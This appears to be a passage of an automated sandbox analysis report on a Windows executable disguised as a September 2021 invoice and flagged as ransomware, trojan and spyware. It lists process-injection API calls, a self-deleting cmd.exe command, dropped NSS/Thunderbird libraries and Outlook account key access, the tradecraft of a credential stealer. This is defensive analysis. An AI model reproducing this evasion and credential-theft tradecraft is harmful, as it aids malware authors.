Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB9D0 NtMapViewOfSection, 0_2_022FB9D0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5E24 NtWriteVirtualMemory, 0_2_022F5E24
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBE21 NtMapViewOfSection, 0_2_022FBE21
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBE33 NtMapViewOfSection, 0_2_022FBE33
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBA02 NtMapViewOfSection, 0_2_022FBA02
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0E1E NtWriteVirtualMemory,LoadLibraryA, 0_2_022F0E1E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5A6E NtWriteVirtualMemory, 0_2_022F5A6E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBE7C NtMapViewOfSection, 0_2_022FBE7C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBA7B NtMapViewOfSection, 0_2_022FBA7B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5679 NtWriteVirtualMemory, 0_2_022F5679
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBAB9 NtMapViewOfSection, 0_2_022FBAB9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5EB4 NtWriteVirtualMemory, 0_2_022F5EB4
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F628C NtWriteVirtualMemory, 0_2_022F628C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBE8A NtMapViewOfSection, 0_2_022FBE8A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5EEB NtWriteVirtualMemory, 0_2_022F5EEB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBEE5 NtMapViewOfSection, 0_2_022FBEE5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5AD7 NtWriteVirtualMemory, 0_2_022F5AD7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBED7 NtMapViewOfSection, 0_2_022FBED7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F630E NtWriteVirtualMemory, 0_2_022F630E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBF03 NtMapViewOfSection, 0_2_022FBF03
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F577F NtWriteVirtualMemory, 0_2_022F577F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBB56 NtMapViewOfSection, 0_2_022FBB56
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5F52 NtWriteVirtualMemory, 0_2_022F5F52
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB3AA NtProtectVirtualMemory, 0_2_022FB3AA
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6FA6 NtAllocateVirtualMemory, 0_2_022F6FA6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBFB9 NtMapViewOfSection, 0_2_022FBFB9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5FE3 NtWriteVirtualMemory, 0_2_022F5FE3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB3F8 NtProtectVirtualMemory, 0_2_022FB3F8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F63CC NtWriteVirtualMemory, 0_2_022F63CC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBBD1 NtMapViewOfSection, 0_2_022FBBD1
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7023 NtAllocateVirtualMemory, 0_2_022F7023
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBC3B NtMapViewOfSection, 0_2_022FBC3B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBC07 NtMapViewOfSection, 0_2_022FBC07
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3416 NtWriteVirtualMemory,LoadLibraryA, 0_2_022F3416
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5C15 NtWriteVirtualMemory, 0_2_022F5C15
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5813 NtWriteVirtualMemory, 0_2_022F5813
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F70A6 NtAllocateVirtualMemory, 0_2_022F70A6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBCA0 NtMapViewOfSection, 0_2_022FBCA0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F608A NtWriteVirtualMemory, 0_2_022F608A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6484 NtWriteVirtualMemory, 0_2_022F6484
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBCE6 NtMapViewOfSection, 0_2_022FBCE6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F58CC NtWriteVirtualMemory, 0_2_022F58CC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB8C8 NtProtectVirtualMemory, 0_2_022FB8C8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F70DB NtAllocateVirtualMemory, 0_2_022F70DB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5CD3 NtWriteVirtualMemory, 0_2_022F5CD3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F611D NtWriteVirtualMemory, 0_2_022F611D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F594D NtWriteVirtualMemory, 0_2_022F594D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F555C NtWriteVirtualMemory, 0_2_022F555C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBDA1 NtMapViewOfSection, 0_2_022FBDA1
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F61B9 NtWriteVirtualMemory, 0_2_022F61B9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9D8E NtWriteVirtualMemory, 0_2_022F9D8E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5D86 NtWriteVirtualMemory, 0_2_022F5D86
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA5E8 NtWriteVirtualMemory, 0_2_022FA5E8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9DE5 NtWriteVirtualMemory, 0_2_022F9DE5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F59E3 NtWriteVirtualMemory, 0_2_022F59E3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBDF3 NtMapViewOfSection, 0_2_022FBDF3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F55CA NtWriteVirtualMemory, 0_2_022F55CA
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: api-ms-win-crt-private-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000000.251809754.000000000041E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000000.539833282.000000000041E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862316814.000000006EA8B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862415894.000000006F6D2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Binary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
PE file contains strange resources
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file contains more sections than normal
Source: sqlite3.dll.24.dr Static PE information: Number of sections : 18 > 10
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Virustotal: Detection: 28%
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@8/69@3/4
Source: softokn3.dll.24.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.24.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.24.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862147868.000000006EA50000.00000002.00020000.sdmp, nss3.dll.24.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.24.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.24.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.24.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.24.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.24.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.24.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.24.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862147868.000000006EA50000.00000002.00020000.sdmp, nss3.dll.24.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862147868.000000006EA50000.00000002.00020000.sdmp, nss3.dll.24.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.24.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862147868.000000006EA50000.00000002.00020000.sdmp, nss3.dll.24.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.24.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Mutant created: \Sessions\1\BaseNamedObjects\user987uh4b36teeorinthj
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_01
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager Jump to behavior
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.24.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.24.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.24.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.24.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.24.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.24.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.24.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.24.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.24.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.24.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.24.dr
